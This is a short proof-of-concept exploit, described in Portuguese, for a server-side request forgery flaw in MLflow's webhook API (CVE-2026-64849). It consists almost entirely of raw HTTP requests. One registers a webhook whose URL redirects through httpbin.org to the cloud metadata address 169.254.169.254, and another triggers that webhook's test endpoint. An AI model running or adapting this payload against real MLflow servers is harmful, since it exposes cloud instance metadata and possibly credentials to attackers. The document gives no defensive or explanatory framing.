
Exploit de prova de conceito para o CVE-2026-64849: dispara SSRF na API de webhook do MLflow por meio de um POST forjado, obtendo metadados da instância de nuvem em 169.254.169.254.
POST /api/2.0/mlflow/webhooks HTTP/1.1
Host:
Content-Type: application/json
{"url": "https://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/", "name": "poc", "events": [{"action": "CREATED", "entity": "REGISTERED_MODEL"}]}
POST /api/2.0/mlflow/webhooks/{id}/test HTTP/1.1